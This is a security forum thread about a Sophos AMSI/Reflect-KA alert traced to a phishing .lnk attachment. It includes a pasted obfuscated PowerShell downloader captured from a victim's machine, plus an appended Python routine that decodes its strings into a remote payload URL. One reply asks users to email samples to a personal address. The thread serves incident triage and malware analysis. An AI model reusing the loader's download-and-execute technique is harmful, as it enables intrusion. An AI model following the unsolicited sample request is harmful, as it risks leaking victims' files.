This discussion has been locked.

AMSI/Reflect-KA Detection

Hello everyone,

We get the following alert:

What happened: We could not clean up a threat.

Where it happened: computer name

Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

What was detected: AMSI/Reflect-KA

How severe it is: High

What Sophos has done so far: We attempted to clean up a threat.

It is only for one user; it used to be two. I cleaned the temp files for both users on their respective PCs, and it seems that fixed the issue for the first user, or maybe it was just a coincidence.

However, this one user's account on this PC keeps giving us this detection.

It seems to be triggered by two different things, but they both lead to PowerShell.

Please see the images; I hope that helps.

Any idea about this? Much appreciated.



  • Hi Jones Malhotra,

    Thanks for reaching out to the Sophos Community Forum. 

    For one of these detections, it looks like a file named "imf & bmf pre-filing practitioner relief fy2023.xls.lnk" was accessed via Outlook, triggering powershell.exe. I'd suggest inquiring with the end user whether they received any suspicious emails or clicked any potentially malicious links via Outlook.

    If you haven't already, I'd suggest looking into Sophos Phish Threat, as it seems a phishing attempt was made against one of your end users. You can also start a trial for Phish Threat directly from Sophos Central to try it out for 30 days at no cost. The trial can also be extended to 60 days.

    Kushal Lakhan
    Team Lead, Global Community Support
    Connect with Sophos Support, get alerted, and be informed.
    If a post solves your question, please use the "Verify Answer" button.
    The New Home of Sophos Support Videos!  Visit Sophos Techvids
  • Hi Kushal,

    That is one of the triggers though?

    Do you know what Reflect-KA is?

    Thanks

  • Yes, a malicious link or attachment via email seems to be where this detection originated. 

    The Reflect-KA detection will trigger when obfuscated powershell code attempts to download a specific malicious payload.

    Kushal Lakhan
  • (imf & bmf pre-filing practitioner relief fy2023.xlsx.lnk) & (psscriptpolicytest_J3jkuxiu.1gn.ps1): it seems that this is a fileless attack. Please find the above files on the attacked host, then package them and send them to my email. Thank you. Pay attention to the real target of the .lnk file. My email is 1928530784@qq.com

  • Please click on Microsoft PowerShell at the top of the chart and look at the window on the right to see what the command line is.

  • I'm curious why HMPA didn't trigger Lockdown. The program has clearly performed beyond its original purpose, executing a .ps1.

  • Hello,

    Thanks for your response

    This is what I got:

    "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Throug9 ([String]$Gastrocele){$Navigatr = 'su'+'bstring';For($Dakshe=1; $Dakshe -lt $Gastrocele.Length-1; $Dakshe+=(1+1)){$Traadethv=$Traadethv+$Gastrocele.$Navigatr.Invoke($Dakshe, 1)};$Traadethv;}$Reticu=Throug9 ' hRtftRpKs :S/ /Tl eBd sDhDeHe t m eKtCaYlu.DcKosm /TZ ZSZ /AETmEpAoCrMtTm .TiKnMfU ';$Traadethv01=Throug9 ' i e xD ';$Mlkevej = Throug9 ' \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ';.($Traadethv01) (Throug9 ' $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ') ;.($Traadethv01) (Throug9 'P$ M lTk eLvEe jD= $CTEahbNsOl iSs tUe 2R+K$ MSl kAeCvPeEjM ') ;.($Traadethv01) (Throug9 'B$ VBr gheNlFsBh eRdSsB M=O (D(OgSw mSiU w i nG3 2 _VpFrUoTcSe sPs B-aFS VPDr o cSeFsosNIIdK= $ { PDI D }a)T. CCoDm mVa n d LNi n eT)u - s p l ibtL K[Nc hSaQr ] 3f4 ');.($Traadethv01) (Throug9 's$FJPu dEiT t= F$ VKr g e l sSh eBdEsT[ $ VPrNg e lssVh eSd s . cCoGuOnFt -S2O] ');.($Traadethv01) (Throug9

    Many Thanks
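The command line quoted above is a concrete instance of what the earlier reply describes for Reflect-KA (obfuscated PowerShell that fetches a payload): every string literal is the real text with one junk character interleaved between each pair of real characters, and the Throug9 helper walks the string from index 1 in steps of two, keeping only the odd-position characters. The decoded pieces are then handed to `iex` (Invoke-Expression) and build the SysWOW64 powershell.exe path from `$env:windir`, which is why the alert names that binary. The Python below is an added example written for this page, not code from the thread, from Sophos, or from the sample; the function and key names are ours, and the obfuscated literals are copied verbatim from the command line above. Only the first five literals are decoded: the later literals in the pasted command line appear to have lost their runs of consecutive spaces in forum rendering and no longer decode cleanly, which is an observation about this page's text rather than about the original sample.

```python
"""Decoder for the every-other-character obfuscation seen in the quoted
command line.  Added example; not code from the thread or from Sophos.
Names (strip_interleaved_junk, CAPTURED_STRINGS, ...) are the editor's own."""
import re


def strip_interleaved_junk(s: str) -> str:
    """Port of the malware's Throug9 routine.

    The original loop is: For($i=1; $i -lt $s.Length-1; $i+=2) { $out += $s.Substring($i,1) }
    so it keeps the characters at odd indexes and discards the junk at even
    indexes, including the padding space at each end of every literal.
    """
    out = []
    i = 1
    while i < len(s) - 1:
        out.append(s[i])
        i += 2
    return "".join(out)


# Literals copied verbatim from the captured command line above (raw strings
# so the backslashes in the path survive).  The key names are ours.
CAPTURED_STRINGS = {
    # $Reticu: the download location the script later fetches
    "download": r" hRtftRpKs :S/ /Tl eBd sDhDeHe t m eKtCaYlu.DcKosm /TZ ZSZ /AETmEpAoCrMtTm .TiKnMfU ",
    # $Traadethv01: the verb every decoded statement is executed with
    "verb": r" i e xD ",
    # $Mlkevej: a path fragment relative to the Windows directory
    "path": r" \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ",
    # first two statements executed via the verb
    "assign1": r" $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ",
    "assign2": r"P$ M lTk eLvEe jD= $CTEahbNsOl iSs tUe 2R+K$ MSl kAeCvPeEjM ",
}


def decode_captured() -> dict:
    """Decode every captured literal; returns {key: plaintext}."""
    return {k: strip_interleaved_junk(v) for k, v in CAPTURED_STRINGS.items()}


def resolve_child_path(decoded: dict, windir: str = r"C:\Windows") -> str:
    """Replay the two decoded assignments ($Tabsliste2=$env:windir, then
    $Mlkevej=$Tabsliste2+$Mlkevej) to get the binary the script launches.
    windir is an assumed value for $env:windir on the affected host."""
    return windir + decoded["path"]


def extract_obfuscated_literals(cmdline: str, decoder_name: str) -> list:
    """Generalisation: pull every single-quoted literal that is passed to the
    named decoder function out of an arbitrary command line and decode it.
    Useful when triaging a new sample that reuses the same scheme under a
    different randomised function name."""
    pat = re.compile(re.escape(decoder_name) + r"\s*'([^']*)'")
    return [strip_interleaved_junk(m) for m in pat.findall(cmdline)]


if __name__ == "__main__":
    decoded = decode_captured()
    for key, text in decoded.items():
        print(f"{key:9s} -> {text}")
    print("launches ->", resolve_child_path(decoded))
```

When the decoded `path` is joined to `$env:windir` it yields the SysWOW64 powershell.exe reported in the alert, and the `download` literal decodes to an https URL ending in `.inf`, which matches the "attempts to download a specific malicious payload" behaviour described for Reflect-KA. Feeding a whole captured command line to `extract_obfuscated_literals(cmdline, "Throug9")` recovers the statements in execution order, so the script's intent can be read without ever running it.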